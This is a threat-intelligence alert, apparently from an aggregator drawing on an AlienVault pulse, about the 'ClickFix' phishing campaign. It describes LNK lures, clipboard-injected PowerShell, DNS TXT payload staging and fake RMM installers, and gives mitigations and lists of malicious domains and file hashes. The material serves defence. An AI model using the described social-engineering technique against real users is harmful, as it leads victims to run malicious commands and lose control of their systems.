PHISH ALERT: From a Simple Phishing Email to a Full Attack Arsenal: The Evolution of "ClickFix"
This is a sophisticated phishing campaign known as the evolution of "ClickFix" that uses social engineering and victim-assisted execution to bypass endpoint security. Attackers send emails with urgent OneDrive document lures containing malicious ZIP attachments. The attack employs LNK shortcuts redirecting victims to landing pages that silently inject PowerShell commands into the clipboard. Victims are tricked into manually executing these commands via Win+R, circumventing traditional security filters. The campaign uses DNS TXT records for payload staging to avoid HTTP detection and includes multiple malicious components such as obfuscated scripts, fake MSI installers masquerading as legitimate software, and spyware-laden ISO images for persistent access. This campaign represents a shift toward long-term post-compromise control of the environment.
AI Analysis
Technical Summary
The phishing campaign leverages evolved ClickFix techniques involving victim-assisted execution to evade modern endpoint defenses. It uses social engineering to convince targets to open malicious ZIP attachments containing LNK shortcuts that redirect to attacker-controlled landing pages. These pages silently place PowerShell commands into the victim's clipboard, which victims then manually execute via the Windows Run dialog (Win+R), bypassing automated detection. The attackers stage payloads using DNS TXT records to avoid HTTP-based detection mechanisms. The threat infrastructure includes obfuscated scripts, fake MSI installers posing as legitimate Remote Monitoring and Management (RMM) tools like ConnectWise, and ISO images containing spyware to maintain persistent access. This campaign focuses on establishing full environmental control post-compromise, indicating a strategic shift to long-term intrusion.
Potential Impact
The campaign enables attackers to bypass endpoint security by leveraging victim interaction to execute malicious commands, leading to credential harvesting, spyware installation, and persistent access. The use of DNS TXT records for payload staging helps evade network detection. The presence of fake MSI installers and obfuscated scripts increases the difficulty of detection and removal. Overall, the campaign facilitates long-term control over compromised environments, posing significant risk to affected organizations.
Mitigation Recommendations
No official patch or fix is available as this is a phishing campaign relying on social engineering and victim-assisted execution. Mitigation should focus on user awareness training to recognize phishing emails and suspicious attachments. Endpoint security solutions should be configured to detect and block LNK shortcut abuse and monitor for unusual PowerShell activity. Network defenses should consider monitoring DNS TXT record queries for suspicious activity. Since this campaign bypasses traditional filters through manual execution, educating users on the risks of executing unsolicited commands is critical.
Indicators of Compromise
- domain: italy-news.info
- domain: lootrioya.info
- domain: document-auth.icu
- hash: 7b7981c99d59595fe15377df84695bb72ce0b85560a3935f930657b2d162e5ef
- hash: adcd15f3d6b87f84d106ea426fa824fd20c9d64f6d199ce92580884290785f30
- hash: d7d2f0ee187549f3f4a114d716be12521fbf62d6d26e2ac23d2a32d521d08fd8
- hash: 79e205576bdad2cce593ae850b0c9e31
- hash: e5989c374fa9cb1bc53b202032257a3c
- hash: 5442dea013b109ac4d0cdc52248b758a6cb9684c
- hash: e46d05b8aa8f1b1a5e81da2ebe2bf8e94cbe85fe
- hash: 7596699747d2b284df77d2c83714aa00
- hash: 5cf01e24f6bafa64815d1bd2f3323ea091d504cc
PHISH ALERT: From a Simple Phishing Email to a Full Attack Arsenal: The Evolution of "ClickFix"
Description
This is a sophisticated phishing campaign known as the evolution of "ClickFix" that uses social engineering and victim-assisted execution to bypass endpoint security. Attackers send emails with urgent OneDrive document lures containing malicious ZIP attachments. The attack employs LNK shortcuts redirecting victims to landing pages that silently inject PowerShell commands into the clipboard. Victims are tricked into manually executing these commands via Win+R, circumventing traditional security filters. The campaign uses DNS TXT records for payload staging to avoid HTTP detection and includes multiple malicious components such as obfuscated scripts, fake MSI installers masquerading as legitimate software, and spyware-laden ISO images for persistent access. This campaign represents a shift toward long-term post-compromise control of the environment.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The phishing campaign leverages evolved ClickFix techniques involving victim-assisted execution to evade modern endpoint defenses. It uses social engineering to convince targets to open malicious ZIP attachments containing LNK shortcuts that redirect to attacker-controlled landing pages. These pages silently place PowerShell commands into the victim's clipboard, which victims then manually execute via the Windows Run dialog (Win+R), bypassing automated detection. The attackers stage payloads using DNS TXT records to avoid HTTP-based detection mechanisms. The threat infrastructure includes obfuscated scripts, fake MSI installers posing as legitimate Remote Monitoring and Management (RMM) tools like ConnectWise, and ISO images containing spyware to maintain persistent access. This campaign focuses on establishing full environmental control post-compromise, indicating a strategic shift to long-term intrusion.
Potential Impact
The campaign enables attackers to bypass endpoint security by leveraging victim interaction to execute malicious commands, leading to credential harvesting, spyware installation, and persistent access. The use of DNS TXT records for payload staging helps evade network detection. The presence of fake MSI installers and obfuscated scripts increases the difficulty of detection and removal. Overall, the campaign facilitates long-term control over compromised environments, posing significant risk to affected organizations.
Mitigation Recommendations
No official patch or fix is available as this is a phishing campaign relying on social engineering and victim-assisted execution. Mitigation should focus on user awareness training to recognize phishing emails and suspicious attachments. Endpoint security solutions should be configured to detect and block LNK shortcut abuse and monitor for unusual PowerShell activity. Network defenses should consider monitoring DNS TXT record queries for suspicious activity. Since this campaign bypasses traditional filters through manual execution, educating users on the risks of executing unsolicited commands is critical.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://x.com/Kb4Threatlabs/status/2069057429514731609"]
- Adversary
- null
- Pulse Id
- 6a3a7809c43cfba36348ed9d
- Threat Score
- null
Indicators of Compromise
Domain
| Value | Description | Copy |
|---|---|---|
domainitaly-news.info | — | |
domainlootrioya.info | — | |
domaindocument-auth.icu | — |
Hash
| Value | Description | Copy |
|---|---|---|
hash7b7981c99d59595fe15377df84695bb72ce0b85560a3935f930657b2d162e5ef | — | |
hashadcd15f3d6b87f84d106ea426fa824fd20c9d64f6d199ce92580884290785f30 | — | |
hashd7d2f0ee187549f3f4a114d716be12521fbf62d6d26e2ac23d2a32d521d08fd8 | — | |
hash79e205576bdad2cce593ae850b0c9e31 | — | |
hashe5989c374fa9cb1bc53b202032257a3c | — | |
hash5442dea013b109ac4d0cdc52248b758a6cb9684c | — | |
hashe46d05b8aa8f1b1a5e81da2ebe2bf8e94cbe85fe | — | |
hash7596699747d2b284df77d2c83714aa00 | — | |
hash5cf01e24f6bafa64815d1bd2f3323ea091d504cc | — |
Threat ID: 6a3ad9daeed863c81e7e613b
Added to database: 06/23/2026, 19:09:14 UTC
Last enriched: 06/23/2026, 19:24:26 UTC
Last updated: 06/23/2026, 20:51:15 UTC
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.